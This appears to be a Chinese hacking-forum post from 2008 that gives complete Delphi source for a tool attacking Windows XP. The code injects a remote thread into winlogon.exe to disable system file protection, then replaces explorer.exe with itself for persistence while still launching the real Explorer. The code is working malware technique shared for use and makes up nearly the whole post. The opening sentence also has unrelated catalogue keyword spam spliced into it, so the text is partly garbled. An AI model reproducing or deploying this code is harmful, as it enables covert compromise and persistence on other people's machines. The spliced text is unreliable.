关闭XP保护。替换explorer¸exe

关闭XP保护。替换explorer¸exe 在偶的VPC上测试是可以的。没有更多的测试. 偶并没有调用dllcache 目录 工贸企业有限空间作业目录特种设备作业人员作业种类与目录特种设备作业人员目录1类医疗器械目录高值医用耗材参考目录 下的.你喜欢吧 { 关闭XP保护。替换explorer.exe } { } { 版权所有 (C) 2008 bbs.secdst.net } { } {*******************************************************} program Project1; uses Windows,TlHelp32; function LowerCase(const S: string): string; //转小写 var Ch: Char; L: Integer; Source, Dest: PChar; begin L := Length(S); SetLength(Result, L); Source := Pointer(S); Dest := Pointer(Result); while L <> 0 do begin Ch := Source^; if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); Dest^ := Ch; Inc(Source); Inc(Dest); Dec(L); end; end; function CreatedMutexEx(MutexName: Pchar): Boolean; var MutexHandle: dword; begin MutexHandle := CreateMutex(nil, True, MutexName); if MutexHandle <> 0 then begin if GetLastError = ERROR_ALREADY_EXISTS then begin //CloseHandle(MutexHandle); Result := False; Exit; end; end; Result := True; end; function GetWinPath: string; //取WINDOWS目录 var Buf: array[0..MAX_PATH] of char; begin GetWindowsDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end; function GetTempDirectory: string; //取临时目录 var Buf: array[0..MAX_PATH] of char; begin GetTempPath(MAX_PATH,Buf); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end; function EnableDebugPriv : Boolean; //提权为DEBUG var hToken : THANDLE; tp : TTokenPrivileges; rl : Cardinal; begin result := false; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken); if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then begin tp.PrivilegeCount := 1; tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl); end; end; procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护 var TID: LongWord; hSfc,hThread: HMODULE; pfnCloseEvents: Pointer; begin hSfc := LoadLibrary('sfc_os.dll'); pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2)); FreeLibrary(hSfc); hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID); WaitForSingleObject(hThread, 4000); end; procedure InitProcess(Name: string); //查找winlogon.exe进程PID var FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; ProcessHandle:dword; begin FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); FProcessEntry32.dwSize:=Sizeof(FProcessEntry32); if Process32First(FSnapshotHandle,FProcessEntry32) then begin repeat If Name = LowerCase(FProcessEntry32.szExeFile) then begin ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID); InjectThread(ProcessHandle); CloseHandle(ProcessHandle); Break; end; until not Process32Next(FSnapshotHandle,FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; const ExpFile = 'explorer.exe'; MasterMutex = 'OpenSoul'; var s: string; begin if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体 if not EnableDebugPriv then Exit; //提权失败退出 InitProcess('winlogon.exe') ; //注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原 s := ParamStr(0) ; //取本名 if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe begin //如果不是 MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //把自己复制到windows目录 为explorer.exe end; WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //运行真正的explorer.exe end.